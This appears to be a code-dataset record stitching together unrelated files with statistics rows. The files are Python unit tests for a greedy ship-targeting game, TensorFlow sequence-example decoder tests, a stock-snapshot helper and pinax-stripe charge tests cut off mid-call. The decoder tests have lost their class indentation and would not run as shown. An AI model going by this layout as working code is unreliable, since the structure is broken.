        partida = Partida(matriz, [A, B], 3, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertTrue(A.estaDerribado())
        self.assertFalse(B.estaDerribado())

    def testTresLanzaderasDosBarcoUnoDerribadoInvertido(self):
        """Mirror case: only B can be finished off; A survives."""
        greedobruto = Greedo()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[10, 40, 30, 10], [50, 30, 80, 100]]
        partida = Partida(matriz, [A, B], 3, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertFalse(A.estaDerribado())
        self.assertTrue(B.estaDerribado())

    def testTresLanzaderasDosBarcoAmbosDerribados(self):
        """Enough firepower for both ships: both are sunk in one turn."""
        greedobruto = Greedo()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[50, 40, 30, 10], [100, 30, 80, 100]]
        partida = Partida(matriz, [A, B], 3, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertTrue(A.estaDerribado())
        self.assertTrue(B.estaDerribado())

    def testTresLanzaderasDosBarcoNingunoDerribado(self):
        """Very high HP (1000 each): neither ship can be sunk this turn."""
        greedobruto = Greedo()
        A = Barco(1000)
        B = Barco(1000)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[50, 40, 30, 10], [100, 30, 80, 100]]
        partida = Partida(matriz, [A, B], 3, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertFalse(A.estaDerribado())
        self.assertFalse(B.estaDerribado())

    def testTresLanzaderasDosBarcoNingunoDerribado2(self):
        """Tiny damage options (1 and 2) leave both 100-HP ships afloat."""
        greedobruto = Greedo()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[1, 1000, 30, 10], [2, 1000, 80, 100]]
        partida = Partida(matriz, [A, B], 3, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertFalse(A.estaDerribado())
        self.assertFalse(B.estaDerribado())
class TestCuatroLanzaderasGreedoSmart(unittest.TestCase):
    """Four-launcher scenario for the naive greedy strategy."""

    def testTresLanzaderasDosBarcosNoSeDisparaABarcoDerribado(self):
        """Once both ships are dead, the remaining launcher idles (None target)."""
        greedo = GreedoNaive()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[50], [100]]
        partida = Partida(matriz, [A, B], 4, greedo)
        targets = greedo.elegirTargetsDeLaPartida(partida)
        self.assertEqual(targets[0], [1, 0, 0, None])
class TestsDiferenciasGreedoNaive(unittest.TestCase):
    """Scenarios where Greedo (exhaustive greedy) beats GreedoNaive."""

    def testGreeedoBrutoEligeElMejorTurnoPosible(self):
        """Greedo finds the turn that sinks C (the weakest ship) outright."""
        greedobruto = Greedo()
        A = Barco(300)
        B = Barco(200)
        C = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        C.setPosicion(0, 2)
        matriz = [[60], [50], [50]]
        partida = Partida(matriz, [A, B, C], 2, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertTrue(C.estaDerribado())
        self.assertFalse(A.estaDerribado())
        self.assertFalse(B.estaDerribado())

    def testGreedoSmartElijeMejorTurnoQueGreedo(self):
        """Same scenario: Greedo sinks C, GreedoNaive sinks nothing."""
        greedobruto = Greedo()
        A = Barco(300)
        B = Barco(200)
        C = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        C.setPosicion(0, 2)
        matriz = [[60], [50], [50]]
        partida = Partida(matriz, [A, B, C], 2, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertTrue(C.estaDerribado())
        self.assertFalse(A.estaDerribado())
        self.assertFalse(B.estaDerribado())
        # Replay the identical setup with the naive strategy: no ship sunk.
        greedo = GreedoNaive()
        A = Barco(300)
        B = Barco(200)
        C = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        C.setPosicion(0, 2)
        partidaG = Partida(matriz, [A, B, C], 2, greedo)
        targets = greedo.elegirTargetsDeLaPartida(partidaG)
        partidaG.setTargetDelTurno(targets[0])
        partidaG.jugarTurno()
        self.assertFalse(C.estaDerribado())
        self.assertFalse(A.estaDerribado())
        self.assertFalse(B.estaDerribado())

    def testGreedoSmartElijeMejorTurnoQueGreedo2(self):
        """Two-ship variant: Greedo sinks B; GreedoNaive sinks neither."""
        greedobruto = Greedo()
        A = Barco(700)
        B = Barco(260)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[300], [280]]
        partida = Partida(matriz, [A, B], 2, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertFalse(A.estaDerribado())
        self.assertTrue(B.estaDerribado())
        # Replay with the naive strategy: B survives as well.
        greedo = GreedoNaive()
        A = Barco(700)
        B = Barco(260)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        partidaG = Partida(matriz, [A, B], 2, greedo)
        targets = greedo.elegirTargetsDeLaPartida(partidaG)
        partidaG.setTargetDelTurno(targets[0])
        partidaG.jugarTurno()
        self.assertFalse(A.estaDerribado())
        self.assertFalse(B.estaDerribado())
| 32.243056
| 67
| 0.725501
| 1,040
| 9,286
| 6.477885
| 0.067308
| 0.071248
| 0.040522
| 0.125872
| 0.799466
| 0.789372
| 0.773638
| 0.768146
| 0.768146
| 0.738756
| 0
| 0.059402
| 0.135257
| 9,286
| 287
| 68
| 32.355401
| 0.779577
| 0
| 0
| 0.796992
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146617
| 1
| 0.071429
| false
| 0
| 0.018797
| 0
| 0.109023
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4aa3afbe073a8df2f221ef741cdfb4adc4207cf4
| 11,307
|
py
|
Python
|
research/object_detection/data_decoders/tf_sequence_example_decoder_test.py
|
akshit-protonn/models
|
38c8c6fe4144c93d6aadd19981c2b90570c29eba
|
[
"Apache-2.0"
] | 82,518
|
2016-02-05T12:07:23.000Z
|
2022-03-31T23:09:47.000Z
|
research/object_detection/data_decoders/tf_sequence_example_decoder_test.py
|
yangxl-2014-fe/models
|
11ea5237818e791a5717716d5413977f4c4db1e3
|
[
"Apache-2.0"
] | 9,021
|
2016-03-08T01:02:05.000Z
|
2022-03-31T08:06:35.000Z
|
research/object_detection/data_decoders/tf_sequence_example_decoder_test.py
|
yangxl-2014-fe/models
|
11ea5237818e791a5717716d5413977f4c4db1e3
|
[
"Apache-2.0"
] | 54,341
|
2016-02-06T17:19:55.000Z
|
2022-03-31T10:27:44.000Z
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf_sequence_example_decoder.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow.compat.v1 as tf
from object_detection.core import standard_fields as fields
from object_detection.data_decoders import tf_sequence_example_decoder
from object_detection.dataset_tools import seq_example_util
from object_detection.utils import test_case
class TfSequenceExampleDecoderTest(test_case.TestCase):
def _create_label_map(self, path):
    """Write a three-item label map ('dog'=1, 'cat'=2, 'panda'=4) to *path*.

    Note 'fox' is intentionally absent — tests rely on unknown labels
    being filtered out / mapped to -1 by the decoder.
    """
    label_map_text = """
      item {
        name: "dog"
        id: 1
      }
      item {
        name: "cat"
        id: 2
      }
      item {
        name: "panda"
        id: 4
      }
    """
    with tf.gfile.Open(path, 'wb') as f:
        f.write(label_map_text)
def _make_random_serialized_jpeg_images(self, num_frames, image_height,
                                        image_width):
    """Return a list of `num_frames` JPEG-encoded random RGB images.

    Images are uniform-random uint8 tensors of shape
    (image_height, image_width, 3), encoded via tf.io.encode_jpeg and
    materialized with self.execute.
    """
    def graph_fn():
        images = tf.cast(tf.random.uniform(
            [num_frames, image_height, image_width, 3],
            maxval=256,
            dtype=tf.int32), dtype=tf.uint8)
        images_list = tf.unstack(images, axis=0)
        return [tf.io.encode_jpeg(image) for image in images_list]
    encoded_images = self.execute(graph_fn, [])
    return encoded_images
def test_decode_sequence_example(self):
    """Decoding a 4-frame sequence example yields padded boxes and classes.

    Labels not present in the label map ('fox') decode to class -1, and
    frames with fewer boxes are zero-padded to the per-sequence maximum.
    """
    num_frames = 4
    image_height = 20
    image_width = 30
    expected_groundtruth_boxes = [
        [[0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 0.0, 0.0]],
        [[0.2, 0.2, 1.0, 1.0], [0.0, 0.0, 1.0, 1.0]],
        [[0.0, 0.0, 1.0, 1.0], [0.1, 0.1, 0.2, 0.2]],
        [[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]]
    ]
    expected_groundtruth_classes = [
        [-1, -1],
        [-1, 1],
        [1, 2],
        [-1, -1]
    ]
    flds = fields.InputDataFields
    encoded_images = self._make_random_serialized_jpeg_images(
        num_frames, image_height, image_width)
    def graph_fn():
        label_map_proto_file = os.path.join(self.get_temp_dir(), 'labelmap.pbtxt')
        self._create_label_map(label_map_proto_file)
        decoder = tf_sequence_example_decoder.TfSequenceExampleDecoder(
            label_map_proto_file=label_map_proto_file)
        sequence_example_serialized = seq_example_util.make_sequence_example(
            dataset_name='video_dataset',
            video_id='video',
            encoded_images=encoded_images,
            image_height=image_height,
            image_width=image_width,
            image_format='JPEG',
            image_source_ids=[str(i) for i in range(num_frames)],
            is_annotated=[[1], [1], [1], [1]],
            bboxes=[
                [[0., 0., 1., 1.]],  # Frame 0.
                [[0.2, 0.2, 1., 1.],
                 [0., 0., 1., 1.]],  # Frame 1.
                [[0., 0., 1., 1.],  # Frame 2.
                 [0.1, 0.1, 0.2, 0.2]],
                [[]],  # Frame 3.
            ],
            label_strings=[
                ['fox'],  # Frame 0. Fox will be filtered out.
                ['fox', 'dog'],  # Frame 1. Fox will be filtered out.
                ['dog', 'cat'],  # Frame 2.
                [],  # Frame 3
            ]).SerializeToString()
        example_string_tensor = tf.convert_to_tensor(sequence_example_serialized)
        return decoder.decode(example_string_tensor)
    tensor_dict_out = self.execute(graph_fn, [])
    self.assertAllClose(expected_groundtruth_boxes,
                        tensor_dict_out[flds.groundtruth_boxes])
    self.assertAllEqual(expected_groundtruth_classes,
                        tensor_dict_out[flds.groundtruth_classes])
def test_decode_sequence_example_context(self):
    """Same as test_decode_sequence_example, plus context features.

    With load_context_features=True the flat 6-float context list is
    decoded into a (2, 3) array (context_feature_length=[3]).
    """
    num_frames = 4
    image_height = 20
    image_width = 30
    expected_groundtruth_boxes = [
        [[0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 0.0, 0.0]],
        [[0.2, 0.2, 1.0, 1.0], [0.0, 0.0, 1.0, 1.0]],
        [[0.0, 0.0, 1.0, 1.0], [0.1, 0.1, 0.2, 0.2]],
        [[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]]
    ]
    expected_groundtruth_classes = [
        [-1, -1],
        [-1, 1],
        [1, 2],
        [-1, -1]
    ]
    expected_context_features = np.array(
        [[0.0, 0.1, 0.2], [0.3, 0.4, 0.5]], dtype=np.float32)
    flds = fields.InputDataFields
    encoded_images = self._make_random_serialized_jpeg_images(
        num_frames, image_height, image_width)
    def graph_fn():
        label_map_proto_file = os.path.join(self.get_temp_dir(), 'labelmap.pbtxt')
        self._create_label_map(label_map_proto_file)
        decoder = tf_sequence_example_decoder.TfSequenceExampleDecoder(
            label_map_proto_file=label_map_proto_file,
            load_context_features=True)
        sequence_example_serialized = seq_example_util.make_sequence_example(
            dataset_name='video_dataset',
            video_id='video',
            encoded_images=encoded_images,
            image_height=image_height,
            image_width=image_width,
            image_format='JPEG',
            image_source_ids=[str(i) for i in range(num_frames)],
            is_annotated=[[1], [1], [1], [1]],
            bboxes=[
                [[0., 0., 1., 1.]],  # Frame 0.
                [[0.2, 0.2, 1., 1.],
                 [0., 0., 1., 1.]],  # Frame 1.
                [[0., 0., 1., 1.],  # Frame 2.
                 [0.1, 0.1, 0.2, 0.2]],
                [[]],  # Frame 3.
            ],
            label_strings=[
                ['fox'],  # Frame 0. Fox will be filtered out.
                ['fox', 'dog'],  # Frame 1. Fox will be filtered out.
                ['dog', 'cat'],  # Frame 2.
                [],  # Frame 3
            ],
            context_features=[0.0, 0.1, 0.2, 0.3, 0.4, 0.5],
            context_feature_length=[3],
            context_features_image_id_list=[b'im_1', b'im_2']
        ).SerializeToString()
        example_string_tensor = tf.convert_to_tensor(sequence_example_serialized)
        return decoder.decode(example_string_tensor)
    tensor_dict_out = self.execute(graph_fn, [])
    self.assertAllClose(expected_groundtruth_boxes,
                        tensor_dict_out[flds.groundtruth_boxes])
    self.assertAllEqual(expected_groundtruth_classes,
                        tensor_dict_out[flds.groundtruth_classes])
    self.assertAllClose(expected_context_features,
                        tensor_dict_out[flds.context_features])
def test_decode_sequence_example_context_image_id_list(self):
  """Decodes a sequence example and checks the context image-id list output.

  Builds a 4-frame sequence example; the label map written by
  self._create_label_map presumably maps 'dog'->1 and 'cat'->2 but not
  'fox' (TODO confirm), so 'fox' boxes decode to class -1, matching
  expected_groundtruth_classes below.
  """
  num_frames = 4
  image_height = 20
  image_width = 30
  # Each frame is padded to 2 boxes; all-zero rows are padding entries.
  expected_groundtruth_boxes = [
      [[0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 0.0, 0.0]],
      [[0.2, 0.2, 1.0, 1.0], [0.0, 0.0, 1.0, 1.0]],
      [[0.0, 0.0, 1.0, 1.0], [0.1, 0.1, 0.2, 0.2]],
      [[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]]
  ]
  # -1 marks filtered labels ('fox', absent from the label map) and padding.
  expected_groundtruth_classes = [
      [-1, -1],
      [-1, 1],
      [1, 2],
      [-1, -1]
  ]
  expected_context_image_ids = [b'im_1', b'im_2']
  flds = fields.InputDataFields
  encoded_images = self._make_random_serialized_jpeg_images(
      num_frames, image_height, image_width)

  def graph_fn():
    label_map_proto_file = os.path.join(self.get_temp_dir(), 'labelmap.pbtxt')
    self._create_label_map(label_map_proto_file)
    # load_context_image_ids=True is what makes the decoder emit
    # context_features_image_id_list, the field under test here.
    decoder = tf_sequence_example_decoder.TfSequenceExampleDecoder(
        label_map_proto_file=label_map_proto_file,
        load_context_image_ids=True)
    sequence_example_serialized = seq_example_util.make_sequence_example(
        dataset_name='video_dataset',
        video_id='video',
        encoded_images=encoded_images,
        image_height=image_height,
        image_width=image_width,
        image_format='JPEG',
        image_source_ids=[str(i) for i in range(num_frames)],
        is_annotated=[[1], [1], [1], [1]],
        bboxes=[
            [[0., 0., 1., 1.]],  # Frame 0.
            [[0.2, 0.2, 1., 1.],
             [0., 0., 1., 1.]],  # Frame 1.
            [[0., 0., 1., 1.],  # Frame 2.
             [0.1, 0.1, 0.2, 0.2]],
            [[]],  # Frame 3.
        ],
        label_strings=[
            ['fox'],  # Frame 0. Fox will be filtered out.
            ['fox', 'dog'],  # Frame 1. Fox will be filtered out.
            ['dog', 'cat'],  # Frame 2.
            [],  # Frame 3
        ],
        context_features=[0.0, 0.1, 0.2, 0.3, 0.4, 0.5],
        context_feature_length=[3],
        context_features_image_id_list=[b'im_1', b'im_2']
    ).SerializeToString()
    example_string_tensor = tf.convert_to_tensor(sequence_example_serialized)
    return decoder.decode(example_string_tensor)

  tensor_dict_out = self.execute(graph_fn, [])
  self.assertAllClose(expected_groundtruth_boxes,
                      tensor_dict_out[flds.groundtruth_boxes])
  self.assertAllEqual(expected_groundtruth_classes,
                      tensor_dict_out[flds.groundtruth_classes])
  self.assertAllEqual(expected_context_image_ids,
                      tensor_dict_out[flds.context_features_image_id_list])
def test_decode_sequence_example_negative_clip(self):
  """Decodes a sequence example that contains no boxes at all (negative clip).

  With empty bboxes/label_strings for every frame, the decoder is expected
  to produce empty (4, 0, 4) box and (4, 0) class tensors.
  """
  num_frames = 4
  image_height = 20
  image_width = 30
  # Zero boxes per frame: the arrays are empty along axis 1, so the -1
  # multiplier has no visible effect but is kept as written.
  expected_groundtruth_boxes = -1 * np.ones((4, 0, 4))
  expected_groundtruth_classes = -1 * np.ones((4, 0))
  flds = fields.InputDataFields
  encoded_images = self._make_random_serialized_jpeg_images(
      num_frames, image_height, image_width)

  def graph_fn():
    sequence_example_serialized = seq_example_util.make_sequence_example(
        dataset_name='video_dataset',
        video_id='video',
        encoded_images=encoded_images,
        image_height=image_height,
        image_width=image_width,
        image_format='JPEG',
        image_source_ids=[str(i) for i in range(num_frames)],
        bboxes=[
            [[]],
            [[]],
            [[]],
            [[]]
        ],
        label_strings=[
            [],
            [],
            [],
            []
        ]).SerializeToString()
    example_string_tensor = tf.convert_to_tensor(sequence_example_serialized)
    label_map_proto_file = os.path.join(self.get_temp_dir(), 'labelmap.pbtxt')
    self._create_label_map(label_map_proto_file)
    decoder = tf_sequence_example_decoder.TfSequenceExampleDecoder(
        label_map_proto_file=label_map_proto_file)
    return decoder.decode(example_string_tensor)

  tensor_dict_out = self.execute(graph_fn, [])
  self.assertAllClose(expected_groundtruth_boxes,
                      tensor_dict_out[flds.groundtruth_boxes])
  self.assertAllEqual(expected_groundtruth_classes,
                      tensor_dict_out[flds.groundtruth_classes])
if __name__ == '__main__':
  # Standard TensorFlow test entry point.
  tf.test.main()
| 36.124601
| 80
| 0.590784
| 1,488
| 11,307
| 4.192204
| 0.137769
| 0.040398
| 0.044726
| 0.048092
| 0.773164
| 0.754729
| 0.727156
| 0.727156
| 0.727156
| 0.720744
| 0
| 0.051718
| 0.276643
| 11,307
| 312
| 81
| 36.240385
| 0.710967
| 0.094809
| 0
| 0.770115
| 0
| 0
| 0.038756
| 0
| 0
| 0
| 0
| 0
| 0.038314
| 1
| 0.042146
| false
| 0
| 0.038314
| 0
| 0.10728
| 0.003831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4aae4ea2c1b4661c54c2e7c215eb7b2f5df9babd
| 937
|
py
|
Python
|
Simulation/stock_snapshot_helper.py
|
SEPHIRONOVA/TradingDataAnalyzer
|
314cb5bc5f5327ceb16d0ce4e283694eb3f16e99
|
[
"MIT"
] | null | null | null |
Simulation/stock_snapshot_helper.py
|
SEPHIRONOVA/TradingDataAnalyzer
|
314cb5bc5f5327ceb16d0ce4e283694eb3f16e99
|
[
"MIT"
] | null | null | null |
Simulation/stock_snapshot_helper.py
|
SEPHIRONOVA/TradingDataAnalyzer
|
314cb5bc5f5327ceb16d0ce4e283694eb3f16e99
|
[
"MIT"
] | null | null | null |
from datetime import datetime, time
from Simulation.stock_snapshot import StockSnapshot
__author__ = 'raymond'
class StockSnapshotHelper:
    """Convenience wrapper around a StockSnapshot exposing derived quote values.

    Mid/high/low prices are computed as the midpoint of the ask and bid
    legs; timestamp/date accessors read the ask leg of the snapshot.
    """

    def __init__(self, stock_snapshot: "StockSnapshot"):
        """Wrap *stock_snapshot* for derived-value access.

        The annotation is a string (forward reference) so the class can be
        imported without Simulation.stock_snapshot being resolvable at
        annotation-evaluation time.
        """
        self.stock_snapshot = stock_snapshot
        # Regular-session close (16:00:00), used by is_end_of_trading_hours().
        self._closing_time = time(16, 0, 0)

    def get_mid_price(self):
        """Return the ask/bid midpoint of the last traded prices."""
        return (self.stock_snapshot.ask_price.last_price + self.stock_snapshot.bid_price.last_price) / 2

    def get_high(self):
        """Return the ask/bid midpoint of the high prices."""
        return (self.stock_snapshot.ask_price.high_price + self.stock_snapshot.bid_price.high_price) / 2

    def get_low(self):
        """Return the ask/bid midpoint of the low prices."""
        return (self.stock_snapshot.ask_price.low_price + self.stock_snapshot.bid_price.low_price) / 2

    def is_end_of_trading_hours(self):
        """Return True when the ask timestamp is exactly the 16:00:00 close."""
        # Return the comparison directly instead of the
        # `if cond: return True / else: return False` anti-pattern.
        return self.stock_snapshot.ask_price.datetime.time() == self._closing_time

    def get_timestamp(self):
        """Return the snapshot's ask-side datetime."""
        return self.stock_snapshot.ask_price.datetime

    def get_date(self):
        """Return the calendar date of the snapshot's ask-side datetime."""
        return self.stock_snapshot.ask_price.datetime.date()
| 29.28125
| 98
| 0.790822
| 140
| 937
| 4.935714
| 0.278571
| 0.244573
| 0.270622
| 0.173661
| 0.454414
| 0.454414
| 0.276411
| 0.124457
| 0
| 0
| 0
| 0.008454
| 0.116329
| 937
| 31
| 99
| 30.225806
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0.007471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.318182
| false
| 0
| 0.090909
| 0.227273
| 0.772727
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
438e313a3fababddaabb504d1689fedb9f0a78a1
| 133,180
|
py
|
Python
|
pinax/stripe/tests/test_actions.py
|
lock8/pinax-stripe
|
50e846e41718646e85219d31676566ebc3fea477
|
[
"MIT"
] | null | null | null |
pinax/stripe/tests/test_actions.py
|
lock8/pinax-stripe
|
50e846e41718646e85219d31676566ebc3fea477
|
[
"MIT"
] | 114
|
2017-10-18T09:14:02.000Z
|
2019-01-24T19:03:01.000Z
|
pinax/stripe/tests/test_actions.py
|
lock8/pinax-stripe
|
50e846e41718646e85219d31676566ebc3fea477
|
[
"MIT"
] | 1
|
2017-10-20T08:13:09.000Z
|
2017-10-20T08:13:09.000Z
|
import datetime
import decimal
import json
import time
from unittest import skipIf
import django
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.utils import timezone
import stripe
from mock import Mock, patch
from ..actions import (
accounts,
charges,
coupons,
customers,
events,
externalaccounts,
invoices,
plans,
refunds,
sources,
subscriptions,
transfers
)
from ..models import (
Account,
BitcoinReceiver,
Card,
Charge,
Coupon,
Customer,
Discount,
Event,
Invoice,
Plan,
Subscription,
Transfer,
UserAccount
)
class ChargesTests(TestCase):
    """Tests for pinax.stripe.actions.charges (create/capture/refund helpers).

    All Stripe API calls are mocked. `assertEquals` (a deprecated alias,
    removed in Python 3.12) has been replaced with `assertEqual`.
    """

    def setUp(self):
        self.User = get_user_model()
        self.user = self.User.objects.create_user(
            username="patrick",
            email="paltman@example.com"
        )
        self.customer = Customer.objects.create(
            user=self.user,
            stripe_id="cus_xxxxxxxxxxxxxxx"
        )

    def test_calculate_refund_amount(self):
        charge = Charge(amount=decimal.Decimal("100"), amount_refunded=decimal.Decimal("50"))
        expected = decimal.Decimal("50")
        actual = charges.calculate_refund_amount(charge)
        self.assertEqual(expected, actual)

    def test_calculate_refund_amount_with_amount_under(self):
        charge = Charge(amount=decimal.Decimal("100"), amount_refunded=decimal.Decimal("50"))
        expected = decimal.Decimal("25")
        actual = charges.calculate_refund_amount(charge, amount=decimal.Decimal("25"))
        self.assertEqual(expected, actual)

    def test_calculate_refund_amount_with_amount_over(self):
        # A requested refund above the refundable balance is capped at it.
        charge = Charge(amount=decimal.Decimal("100"), amount_refunded=decimal.Decimal("50"))
        expected = decimal.Decimal("50")
        actual = charges.calculate_refund_amount(charge, amount=decimal.Decimal("100"))
        self.assertEqual(expected, actual)

    def test_create_amount_not_decimal_raises_error(self):
        with self.assertRaises(ValueError):
            charges.create(customer=self.customer, amount=10)

    def test_create_no_customer_nor_source_raises_error(self):
        with self.assertRaises(ValueError) as exc:
            charges.create(amount=decimal.Decimal("10"),
                           customer=None)
        self.assertEqual(exc.exception.args, ("Must provide `customer` or `source`.",))

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_send_receipt_False_skips_sending_receipt(self, CreateMock, SyncMock, SendReceiptMock):
        charges.create(amount=decimal.Decimal("10"), customer=self.customer, send_receipt=False)
        self.assertTrue(CreateMock.called)
        self.assertTrue(SyncMock.called)
        self.assertFalse(SendReceiptMock.called)

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_with_customer(self, CreateMock, SyncMock, SendReceiptMock):
        charges.create(amount=decimal.Decimal("10"), customer=self.customer)
        self.assertTrue(CreateMock.called)
        _, kwargs = CreateMock.call_args
        # Amount is converted to integer cents before hitting the API.
        self.assertEqual(kwargs, {
            "amount": 1000,
            "currency": "usd",
            "source": None,
            "customer": "cus_xxxxxxxxxxxxxxx",
            "stripe_account": None,
            "description": None,
            "capture": True,
            "idempotency_key": None,
        })
        self.assertTrue(SyncMock.called)
        self.assertTrue(SendReceiptMock.called)

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_with_customer_id(self, CreateMock, SyncMock, SendReceiptMock):
        charges.create(amount=decimal.Decimal("10"), customer=self.customer.stripe_id)
        self.assertTrue(CreateMock.called)
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs, {
            "amount": 1000,
            "currency": "usd",
            "source": None,
            "customer": "cus_xxxxxxxxxxxxxxx",
            "stripe_account": None,
            "description": None,
            "capture": True,
            "idempotency_key": None,
        })
        self.assertTrue(SyncMock.called)
        self.assertTrue(SendReceiptMock.called)

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_with_new_customer_id(self, CreateMock, SyncMock, SendReceiptMock):
        # Charging an unknown customer id creates a local Customer record.
        charges.create(amount=decimal.Decimal("10"), customer="cus_NEW")
        self.assertTrue(CreateMock.called)
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs, {
            "amount": 1000,
            "currency": "usd",
            "source": None,
            "customer": "cus_NEW",
            "stripe_account": None,
            "description": None,
            "capture": True,
            "idempotency_key": None,
        })
        self.assertTrue(SyncMock.called)
        self.assertTrue(SendReceiptMock.called)
        self.assertTrue(Customer.objects.get(stripe_id="cus_NEW"))

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_with_idempotency_key(self, CreateMock, SyncMock, SendReceiptMock):
        charges.create(amount=decimal.Decimal("10"), customer=self.customer.stripe_id, idempotency_key="a")
        CreateMock.assert_called_once_with(
            amount=1000,
            capture=True,
            customer=self.customer.stripe_id,
            stripe_account=self.customer.stripe_account_stripe_id,
            idempotency_key="a",
            description=None,
            currency="usd",
            source=None,
        )

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_with_app_fee(self, CreateMock, SyncMock, SendReceiptMock):
        charges.create(
            amount=decimal.Decimal("10"),
            customer=self.customer,
            destination_account="xxx",
            application_fee=decimal.Decimal("25")
        )
        self.assertTrue(CreateMock.called)
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["application_fee"], 2500)
        self.assertEqual(kwargs["destination"]["account"], "xxx")
        self.assertEqual(kwargs["destination"].get("amount"), None)
        self.assertTrue(SyncMock.called)
        self.assertTrue(SendReceiptMock.called)

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_with_destination(self, CreateMock, SyncMock, SendReceiptMock):
        charges.create(
            amount=decimal.Decimal("10"),
            customer=self.customer,
            destination_account="xxx",
            destination_amount=decimal.Decimal("45")
        )
        self.assertTrue(CreateMock.called)
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["destination"]["account"], "xxx")
        self.assertEqual(kwargs["destination"]["amount"], 4500)
        self.assertTrue(SyncMock.called)
        self.assertTrue(SendReceiptMock.called)

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_with_on_behalf_of(self, CreateMock, SyncMock, SendReceiptMock):
        charges.create(
